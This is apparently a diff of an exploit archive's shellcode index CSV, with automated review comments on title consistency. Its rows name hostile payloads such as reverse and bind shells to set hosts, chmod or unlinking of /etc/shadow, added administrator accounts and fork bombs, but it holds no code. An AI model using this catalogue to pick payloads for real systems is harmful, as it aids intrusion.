13630,platforms/win_x86/shellcode/13630.c,"Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes)",2010-02-28,"Hazem mofeed",win_x86,shellcode,0 13630,platforms/win_x86/shellcode/13630.c,"Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes)",2010-02-28,"Hazem mofeed",win_x86,shellcode,0
13631,platforms/win_x86/shellcode/13631.c,"Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes)",2010-03-01,"Hazem mofeed",win_x86,shellcode,0 13631,platforms/win_x86/shellcode/13631.c,"Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes)",2010-03-01,"Hazem mofeed",win_x86,shellcode,0
13632,platforms/lin_x86/shellcode/13632.c,"Linux/x86 - Disabled modsecurity Shellcode (64 bytes)",2010-03-04,sekfault,lin_x86,shellcode,0 13632,platforms/lin_x86/shellcode/13632.c,"Linux/x86 - Disable modsecurity Shellcode (64 bytes)",2010-03-04,sekfault,lin_x86,shellcode,0
13635,platforms/win_x86/shellcode/13635.txt,"Windows x86 - JITed Stage-0 Shellcode",2010-03-07,"Alexey Sintsov",win_x86,shellcode,0 13635,platforms/win_x86/shellcode/13635.txt,"Windows x86 - JITed Stage-0 Shellcode",2010-03-07,"Alexey Sintsov",win_x86,shellcode,0
13636,platforms/win_x86/shellcode/13636.c,"Windows x86 - JITed exec notepad Shellcode",2010-03-08,"Alexey Sintsov",win_x86,shellcode,0 13636,platforms/win_x86/shellcode/13636.c,"Windows x86 - JITed exec notepad Shellcode",2010-03-08,"Alexey Sintsov",win_x86,shellcode,0
13639,platforms/win_x86/shellcode/13639.c,"Windows XP Professional SP2 (Italian) - calc.exe Shellcode (36 bytes)",2010-03-11,Stoke,win_x86,shellcode,0 13639,platforms/win_x86/shellcode/13639.c,"Windows XP Professional SP2 (Italian) - calc.exe Shellcode (36 bytes)",2010-03-11,Stoke,win_x86,shellcode,0
@ -16104,7 +16106,7 @@ id,file,description,date,author,platform,type,port
13671,platforms/lin_x86/shellcode/13671.c,"Linux/x86 - DoS-Badger-Game Shellcode (6 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0 13671,platforms/lin_x86/shellcode/13671.c,"Linux/x86 - DoS-Badger-Game Shellcode (6 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0
13673,platforms/lin_x86/shellcode/13673.c,"Linux/x86 - SLoc-DoS Shellcode (55 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0 13673,platforms/lin_x86/shellcode/13673.c,"Linux/x86 - SLoc-DoS Shellcode (55 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0
13675,platforms/lin_x86/shellcode/13675.c,"Linux/x86 - execve(_a->/bin/sh_) Local-only Shellcode (14 bytes)",2010-04-17,Magnefikko,lin_x86,shellcode,0 13675,platforms/lin_x86/shellcode/13675.c,"Linux/x86 - execve(_a->/bin/sh_) Local-only Shellcode (14 bytes)",2010-04-17,Magnefikko,lin_x86,shellcode,0
13676,platforms/lin_x86/shellcode/13676.c,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (33 bytes)",2010-04-18,sm0k,lin_x86,shellcode,0 13676,platforms/lin_x86/shellcode/13676.c,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (33 bytes)",2010-04-18,sm0k,lin_x86,shellcode,0
13677,platforms/lin_x86/shellcode/13677.c,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (29 bytes)",2010-04-19,Magnefikko,lin_x86,shellcode,0 13677,platforms/lin_x86/shellcode/13677.c,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (29 bytes)",2010-04-19,Magnefikko,lin_x86,shellcode,0
13679,platforms/generator/shellcode/13679.py,"Linux - write() + exit(0) Shellcode (Generator)",2010-04-20,Stoke,generator,shellcode,0 13679,platforms/generator/shellcode/13679.py,"Linux - write() + exit(0) Shellcode (Generator)",2010-04-20,Stoke,generator,shellcode,0
13680,platforms/lin_x86/shellcode/13680.c,"Linux/x86 - Fork Bomb Polymorphic Shellcode (30 bytes)",2010-04-21,"Jonathan Salwan",lin_x86,shellcode,0 13680,platforms/lin_x86/shellcode/13680.c,"Linux/x86 - Fork Bomb Polymorphic Shellcode (30 bytes)",2010-04-21,"Jonathan Salwan",lin_x86,shellcode,0
@ -16121,14 +16123,14 @@ id,file,description,date,author,platform,type,port
13704,platforms/solaris_x86/shellcode/13704.c,"Solaris/x86 - execve(_/bin/sh___/bin/sh__NULL) Shellcode (27 bytes)",2010-05-20,"Jonathan Salwan",solaris_x86,shellcode,0 13704,platforms/solaris_x86/shellcode/13704.c,"Solaris/x86 - execve(_/bin/sh___/bin/sh__NULL) Shellcode (27 bytes)",2010-05-20,"Jonathan Salwan",solaris_x86,shellcode,0
13707,platforms/solaris_x86/shellcode/13707.c,"Solaris/x86 - Halt Shellcode (36 bytes)",2010-05-20,"Jonathan Salwan",solaris_x86,shellcode,0 13707,platforms/solaris_x86/shellcode/13707.c,"Solaris/x86 - Halt Shellcode (36 bytes)",2010-05-20,"Jonathan Salwan",solaris_x86,shellcode,0
13709,platforms/solaris_x86/shellcode/13709.c,"Solaris/x86 - Reboot() Shellcode (37 bytes)",2010-05-21,"Jonathan Salwan",solaris_x86,shellcode,0 13709,platforms/solaris_x86/shellcode/13709.c,"Solaris/x86 - Reboot() Shellcode (37 bytes)",2010-05-21,"Jonathan Salwan",solaris_x86,shellcode,0
13711,platforms/solaris_x86/shellcode/13711.c,"Solaris/x86 - Download File Shellcode (79 bytes)",2010-05-25,"Jonathan Salwan",solaris_x86,shellcode,0 13711,platforms/solaris_x86/shellcode/13711.c,"Solaris/x86 - Download File (http://shell-storm.org/exemple-solaris) Shellcode (79 bytes)",2010-05-25,"Jonathan Salwan",solaris_x86,shellcode,0
13712,platforms/lin_x86/shellcode/13712.c,"Linux/x86 - Disable ASLR Security Shellcode Shellcode (106 bytes)",2010-05-25,"Jonathan Salwan",lin_x86,shellcode,0 13712,platforms/lin_x86/shellcode/13712.c,"Linux/x86 - Disable ASLR Security Shellcode (106 bytes)",2010-05-25,"Jonathan Salwan",lin_x86,shellcode,0
13715,platforms/lin_x86/shellcode/13715.c,"Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode (83 bytes)",2010-05-27,agix,lin_x86,shellcode,0 13715,platforms/lin_x86/shellcode/13715.c,"Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode (83 bytes)",2010-05-27,agix,lin_x86,shellcode,0
13716,platforms/lin_x86/shellcode/13716.c,"Linux/x86 - Fork Bomb Alphanumeric Shellcode (117 bytes)",2010-05-27,agix,lin_x86,shellcode,0 13716,platforms/lin_x86/shellcode/13716.c,"Linux/x86 - Fork Bomb Alphanumeric Shellcode (117 bytes)",2010-05-27,agix,lin_x86,shellcode,0
13719,platforms/win_x86-64/shellcode/13719.txt,"Windows 7 Professional SP1 x64 (FR) - (Beep) Shellcode (39 bytes)",2010-05-28,agix,win_x86-64,shellcode,0 13719,platforms/win_x86-64/shellcode/13719.txt,"Windows 7 Professional SP1 x64 (FR) - (Beep) Shellcode (39 bytes)",2010-05-28,agix,win_x86-64,shellcode,0
13722,platforms/lin_x86/shellcode/13722.c,"Linux/x86 - setuid(0) + chmod 0666 /etc/shadow Polymorphic Shellcode (61 bytes)",2010-05-31,antrhacks,lin_x86,shellcode,0 13722,platforms/lin_x86/shellcode/13722.c,"Linux/x86 - setuid(0) + chmod 0666 /etc/shadow Polymorphic Shellcode (61 bytes)",2010-05-31,antrhacks,lin_x86,shellcode,0
13723,platforms/lin_x86/shellcode/13723.c,"Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/shadow Shellcode (39 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0 13723,platforms/lin_x86/shellcode/13723.c,"Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/shadow Shellcode (39 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0
13724,platforms/lin_x86/shellcode/13724.c,"Linux/x86 - kill all running process Shellcode (11 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0 13724,platforms/lin_x86/shellcode/13724.c,"Linux/x86 - Kill All Running Process Shellcode (11 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0
13725,platforms/lin_x86/shellcode/13725.txt,"Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/passwd Shellcode (39 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0 13725,platforms/lin_x86/shellcode/13725.txt,"Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/passwd Shellcode (39 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0
13726,platforms/lin_x86/shellcode/13726.txt,"Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0 13726,platforms/lin_x86/shellcode/13726.txt,"Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0
13728,platforms/lin_x86/shellcode/13728.c,"Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve (_/bin/sh_) Shellcode (39 bytes)",2010-06-01,gunslinger_,lin_x86,shellcode,0 13728,platforms/lin_x86/shellcode/13728.c,"Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve (_/bin/sh_) Shellcode (39 bytes)",2010-06-01,gunslinger_,lin_x86,shellcode,0
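Review bot: the retitle of 13724 to "Kill All Running Process" changes only the case and keeps the singular noun; "Kill All Running Processes" is what the description means. It is worth fixing in the same edit so the row does not need a second pass.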
@ -16136,7 +16138,7 @@ id,file,description,date,author,platform,type,port
13730,platforms/lin_x86/shellcode/13730.c,"Linux/x86 - unlink _/etc/shadow_ Shellcode (33 bytes)",2010-06-02,gunslinger_,lin_x86,shellcode,0 13730,platforms/lin_x86/shellcode/13730.c,"Linux/x86 - unlink _/etc/shadow_ Shellcode (33 bytes)",2010-06-02,gunslinger_,lin_x86,shellcode,0
13731,platforms/lin_x86/shellcode/13731.c,"Linux/x86 - Hard Reboot Shellcode (29 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode,0 13731,platforms/lin_x86/shellcode/13731.c,"Linux/x86 - Hard Reboot Shellcode (29 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode,0
13732,platforms/lin_x86/shellcode/13732.c,"Linux/x86 - Hard Reboot Shellcode (33 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode,0 13732,platforms/lin_x86/shellcode/13732.c,"Linux/x86 - Hard Reboot Shellcode (33 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode,0
13733,platforms/solaris/shellcode/13733.c,"Solaris/x86 - SystemV killall command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",solaris,shellcode,0 13733,platforms/solaris/shellcode/13733.c,"Solaris/x86 - SystemV killall Command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",solaris,shellcode,0
13742,platforms/lin_x86/shellcode/13742.c,"Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0 13742,platforms/lin_x86/shellcode/13742.c,"Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0
13743,platforms/lin_x86/shellcode/13743.c,"Linux/x86 - give all user root access when execute /bin/sh Shellcode (45 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0 13743,platforms/lin_x86/shellcode/13743.c,"Linux/x86 - give all user root access when execute /bin/sh Shellcode (45 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0
14334,platforms/lin_x86/shellcode/14334.c,"Linux/x86 - Reverse Netcat Shell (8080/TCP) Shellcode (76 bytes)",2010-07-11,blake,lin_x86,shellcode,0 14334,platforms/lin_x86/shellcode/14334.c,"Linux/x86 - Reverse Netcat Shell (8080/TCP) Shellcode (76 bytes)",2010-07-11,blake,lin_x86,shellcode,0
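Review bot: 13733 gets a new title, but its path and platform column stay `solaris` while the title says Solaris/x86 and the other Solaris/x86 rows (13704 to 13711) use `solaris_x86`. If the platform value is meant to match the title prefix, correct it together with the title; if moving the file is out of scope for this change, say so in the commit message.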
@ -16169,7 +16171,7 @@ id,file,description,date,author,platform,type,port
14691,platforms/lin_x86/shellcode/14691.c,"Linux/x86 - execve /bin/sh Polymorphic Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,lin_x86,shellcode,0 14691,platforms/lin_x86/shellcode/14691.c,"Linux/x86 - execve /bin/sh Polymorphic Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,lin_x86,shellcode,0
14697,platforms/windows/shellcode/14697.c,"Windows XP SP3 (English) - MessageBoxA Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous",windows,shellcode,0 14697,platforms/windows/shellcode/14697.c,"Windows XP SP3 (English) - MessageBoxA Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous",windows,shellcode,0
14795,platforms/bsd_x86/shellcode/14795.c,"BSD/x86 - Bind TCP Shell (2525/TCP) Shellcode (167 bytes)",2010-08-25,beosroot,bsd_x86,shellcode,0 14795,platforms/bsd_x86/shellcode/14795.c,"BSD/x86 - Bind TCP Shell (2525/TCP) Shellcode (167 bytes)",2010-08-25,beosroot,bsd_x86,shellcode,0
14873,platforms/win_x86/shellcode/14873.asm,"Windows x86 - Checksum Routine Shellcode (18 bytes)",2010-09-02,dijital1,win_x86,shellcode,0 14873,platforms/win_x86/shellcode/14873.asm,"Windows x86 - Egghunter Checksum Routine Shellcode (18 bytes)",2010-09-02,dijital1,win_x86,shellcode,0
14907,platforms/arm/shellcode/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes)",2010-09-05,"Jonathan Salwan",arm,shellcode,0 14907,platforms/arm/shellcode/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes)",2010-09-05,"Jonathan Salwan",arm,shellcode,0
15063,platforms/win_x86/shellcode/15063.c,"Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)",2010-09-20,ZoRLu,win_x86,shellcode,0 15063,platforms/win_x86/shellcode/15063.c,"Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)",2010-09-20,ZoRLu,win_x86,shellcode,0
15116,platforms/windows/shellcode/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2) - MessageBox Shellcode (ARM)",2010-09-26,"Celil Ünüver",windows,shellcode,0 15116,platforms/windows/shellcode/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2) - MessageBox Shellcode (ARM)",2010-09-26,"Celil Ünüver",windows,shellcode,0
@ -16177,8 +16179,8 @@ id,file,description,date,author,platform,type,port
15202,platforms/win_x86/shellcode/15202.c,"Windows XP Professional SP3 (English) x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0 15202,platforms/win_x86/shellcode/15202.c,"Windows XP Professional SP3 (English) x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0
15203,platforms/win_x86/shellcode/15203.c,"Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0 15203,platforms/win_x86/shellcode/15203.c,"Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0
15314,platforms/arm/shellcode/15314.asm,"ARM - Bind TCP Shell (0x1337/TCP) Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 15314,platforms/arm/shellcode/15314.asm,"ARM - Bind TCP Shell (0x1337/TCP) Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
15315,platforms/arm/shellcode/15315.asm,"ARM - Bind (68/UDP) + Reverse Shell (192.168.0.1:67/UDP) Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 15315,platforms/arm/shellcode/15315.asm,"ARM - Bind TCP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/UDP) Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
15316,platforms/arm/shellcode/15316.asm,"ARM - Loader (0x1337/TCP) Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 15316,platforms/arm/shellcode/15316.asm,"ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
15317,platforms/arm/shellcode/15317.asm,"ARM - ifconfig eth0 192.168.0.2 up Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 15317,platforms/arm/shellcode/15317.asm,"ARM - ifconfig eth0 192.168.0.2 up Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
15616,platforms/arm/shellcode/15616.c,"Linux/ARM - Add Root User (shell-storm/toor) Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",arm,shellcode,0 15616,platforms/arm/shellcode/15616.c,"Linux/ARM - Add Root User (shell-storm/toor) Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",arm,shellcode,0
15618,platforms/osx/shellcode/15618.c,"OSX/Intel x86-64 - setuid shell Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",osx,shellcode,0 15618,platforms/osx/shellcode/15618.c,"OSX/Intel x86-64 - setuid shell Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",osx,shellcode,0
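Review bot: the new title for 15315 contradicts itself, reading "Bind TCP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/UDP)", so the protocol named in the words (TCP) disagrees with the protocol in both port annotations (UDP). The old title made no TCP claim. Check 15315.asm and make the wording and the port annotations agree before this lands, since anyone filtering the CSV by transport will get this row wrong either way.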
@ -16188,8 +16190,8 @@ id,file,description,date,author,platform,type,port
16026,platforms/bsd_x86/shellcode/16026.c,"BSD/x86 - Bind TCP Shell (31337/TCP) + fork Shellcode (111 bytes)",2011-01-21,Tosh,bsd_x86,shellcode,0 16026,platforms/bsd_x86/shellcode/16026.c,"BSD/x86 - Bind TCP Shell (31337/TCP) + fork Shellcode (111 bytes)",2011-01-21,Tosh,bsd_x86,shellcode,0
16283,platforms/win_x86/shellcode/16283.txt,"Windows x86 - eggsearch Shellcode (33 bytes)",2011-03-05,oxff,win_x86,shellcode,0 16283,platforms/win_x86/shellcode/16283.txt,"Windows x86 - eggsearch Shellcode (33 bytes)",2011-03-05,oxff,win_x86,shellcode,0
17432,platforms/sh4/shellcode/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",sh4,shellcode,0 17432,platforms/sh4/shellcode/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",sh4,shellcode,0
17194,platforms/lin_x86/shellcode/17194.txt,"Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69 bytes)",2011-04-21,"Jonathan Salwan",lin_x86,shellcode,0 17194,platforms/lin_x86/shellcode/17194.txt,"Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",lin_x86,shellcode,0
17224,platforms/osx/shellcode/17224.s,"OSX/Intel (x86-64) - Reverse TCP /bin/sh Shell (FFFFFFFF:4444/TCP) Shellcode (131 bytes)",2011-04-29,hammackj,osx,shellcode,0 17224,platforms/osx/shellcode/17224.s,"OSX/Intel x86-64 - Reverse TCP /bin/sh Shell (FFFFFFFF:4444/TCP) Shellcode (131 bytes)",2011-04-29,hammackj,osx,shellcode,0
17323,platforms/windows/shellcode/17323.c,"Windows - Add Local Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes)",2011-05-25,RubberDuck,windows,shellcode,0 17323,platforms/windows/shellcode/17323.c,"Windows - Add Local Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes)",2011-05-25,RubberDuck,windows,shellcode,0
20195,platforms/lin_x86/shellcode/20195.c,"Linux/x86 - Disable ASLR Security Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0 20195,platforms/lin_x86/shellcode/20195.c,"Linux/x86 - Disable ASLR Security Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0
17326,platforms/generator/shellcode/17326.rb,"Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",generator,shellcode,0 17326,platforms/generator/shellcode/17326.rb,"Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",generator,shellcode,0
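Review bot: 17194 changes "(69 bytes)" to "(69/93 bytes)" without saying what the two sizes refer to. For a row described as "Polymorphic XOR Encoded", a reader sizing a signature or a buffer cannot tell which figure is the encoded form; either label the two numbers in the title or keep the one that matches the listing as shipped.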
@ -16197,8 +16199,8 @@ id,file,description,date,author,platform,type,port
17439,platforms/sh4/shellcode/17439.c,"Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",sh4,shellcode,0 17439,platforms/sh4/shellcode/17439.c,"Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",sh4,shellcode,0
17545,platforms/win_x86/shellcode/17545.txt,"Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,win_x86,shellcode,0 17545,platforms/win_x86/shellcode/17545.txt,"Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,win_x86,shellcode,0
17559,platforms/lin_x86/shellcode/17559.c,"Linux/x86 - Egghunter Null-Free Shellcode (29 bytes)",2011-07-21,"Ali Raheem",lin_x86,shellcode,0 17559,platforms/lin_x86/shellcode/17559.c,"Linux/x86 - Egghunter Null-Free Shellcode (29 bytes)",2011-07-21,"Ali Raheem",lin_x86,shellcode,0
17564,platforms/osx/shellcode/17564.asm,"OSX - Universal ROP Shellcode",2011-07-24,pa_kt,osx,shellcode,0 17564,platforms/osx/shellcode/17564.asm,"OSX - Universal ROP + Reverse TCP Shell Shellcode",2011-07-24,pa_kt,osx,shellcode,0
17940,platforms/linux_mips/shellcode/17940.c,"Linux/MIPS - execve Shellcode (52 bytes)",2011-10-07,entropy,linux_mips,shellcode,0 17940,platforms/linux_mips/shellcode/17940.c,"Linux/MIPS - execve /bin/sh Shellcode (52 bytes)",2011-10-07,entropy,linux_mips,shellcode,0
17996,platforms/generator/shellcode/17996.c,"Linux/MIPS - XOR Encoder Shellcode (60 bytes) (Generator)",2011-10-18,entropy,generator,shellcode,0 17996,platforms/generator/shellcode/17996.c,"Linux/MIPS - XOR Encoder Shellcode (60 bytes) (Generator)",2011-10-18,entropy,generator,shellcode,0
18154,platforms/sh4/shellcode/18154.c,"Linux/SuperH (sh4) - setuid(0); + execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes)",2011-11-24,"Jonathan Salwan",sh4,shellcode,0 18154,platforms/sh4/shellcode/18154.c,"Linux/SuperH (sh4) - setuid(0); + execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes)",2011-11-24,"Jonathan Salwan",sh4,shellcode,0
18162,platforms/linux_mips/shellcode/18162.c,"Linux/MIPS - execve /bin/sh Shellcode (48 bytes)",2011-11-27,rigan,linux_mips,shellcode,0 18162,platforms/linux_mips/shellcode/18162.c,"Linux/MIPS - execve /bin/sh Shellcode (48 bytes)",2011-11-27,rigan,linux_mips,shellcode,0
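Review bot: 17564 gains "Reverse TCP Shell" but no destination, whereas other reverse-shell titles in this file carry host and port, for example "(10.1.1.2:0x1337/TCP)" in 21252. If the address and port are fixed in 17564.asm, add them in the same form; if they are supplied by the caller, leave them out but keep that distinction consistent across rows.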
@ -16214,11 +16216,11 @@ id,file,description,date,author,platform,type,port
21252,platforms/arm/shellcode/21252.asm,"Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (10.1.1.2:0x1337/TCP) Shellcode (72 bytes)",2012-09-11,midnitesnake,arm,shellcode,0 21252,platforms/arm/shellcode/21252.asm,"Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (10.1.1.2:0x1337/TCP) Shellcode (72 bytes)",2012-09-11,midnitesnake,arm,shellcode,0
21253,platforms/arm/shellcode/21253.asm,"Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (30 bytes)",2012-09-11,midnitesnake,arm,shellcode,0 21253,platforms/arm/shellcode/21253.asm,"Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (30 bytes)",2012-09-11,midnitesnake,arm,shellcode,0
21254,platforms/arm/shellcode/21254.asm,"Linux/ARM (Raspberry Pi) - chmod 0777 /etc/shadow Shellcode (41 bytes)",2012-09-11,midnitesnake,arm,shellcode,0 21254,platforms/arm/shellcode/21254.asm,"Linux/ARM (Raspberry Pi) - chmod 0777 /etc/shadow Shellcode (41 bytes)",2012-09-11,midnitesnake,arm,shellcode,0
40363,platforms/win_x86/shellcode/40363.c,"Windows x86 - Bind TCP Password (damn_it!$$##@;*#) Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 40363,platforms/win_x86/shellcode/40363.c,"Windows x86 - Bind TCP Password (damn_it!$$##@;*#) Shell Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
22489,platforms/windows/shellcode/22489.cpp,"Windows XP Professional SP3 - calc Full ROP Shellcode (428 bytes)",2012-11-05,b33f,windows,shellcode,0 22489,platforms/windows/shellcode/22489.cpp,"Windows XP Professional SP3 - calc Full ROP Shellcode (428 bytes)",2012-11-05,b33f,windows,shellcode,0
40890,platforms/win_x86-64/shellcode/40890.c,"Windows x64 - Bind TCP Shell (4444/TCP) Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 40890,platforms/win_x86-64/shellcode/40890.c,"Windows x64 - Bind TCP Shell (4444/TCP) Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
23622,platforms/lin_x86/shellcode/23622.c,"Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",lin_x86,shellcode,0 23622,platforms/lin_x86/shellcode/23622.c,"Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",lin_x86,shellcode,0
24318,platforms/windows/shellcode/24318.c,"Windows - URLDownloadToFile + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,windows,shellcode,0 24318,platforms/windows/shellcode/24318.c,"Windows - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,windows,shellcode,0
25497,platforms/lin_x86/shellcode/25497.c,"Linux/x86 - Reverse TCP Shell (192.168.1.10:31337/TCP) Shellcode (92 bytes)",2013-05-17,"Russell Willis",lin_x86,shellcode,0 25497,platforms/lin_x86/shellcode/25497.c,"Linux/x86 - Reverse TCP Shell (192.168.1.10:31337/TCP) Shellcode (92 bytes)",2013-05-17,"Russell Willis",lin_x86,shellcode,0
40387,platforms/hardware/shellcode/40387.nasm,"Cisco ASA - Authentication Bypass _EXTRABACON_ (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",hardware,shellcode,0 40387,platforms/hardware/shellcode/40387.nasm,"Cisco ASA - Authentication Bypass _EXTRABACON_ (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",hardware,shellcode,0
27132,platforms/hardware/shellcode/27132.txt,"MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",hardware,shellcode,0 27132,platforms/hardware/shellcode/27132.txt,"MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",hardware,shellcode,0
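Review bot: the 40363 title now reads "Bind TCP Password (damn_it!$$##@;*#) Shell Shellcode", which puts the password between "Bind TCP" and "Shell" and gives no port. 40890 two rows below uses "Bind TCP Shell (4444/TCP)" and 35586 uses "Bind TCP /bin/sh Shell (4444/TCP) + Password (Z~r0)"; follow that order here, with the port if the listing has a fixed one.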
@ -16230,12 +16232,12 @@ id,file,description,date,author,platform,type,port
29436,platforms/linux_mips/shellcode/29436.asm,"Linux/MIPS (Little Endian) - Reverse TCP /bin/sh Shell (192.168.1.177:31337/TCP) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",linux_mips,shellcode,0 29436,platforms/linux_mips/shellcode/29436.asm,"Linux/MIPS (Little Endian) - Reverse TCP /bin/sh Shell (192.168.1.177:31337/TCP) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",linux_mips,shellcode,0
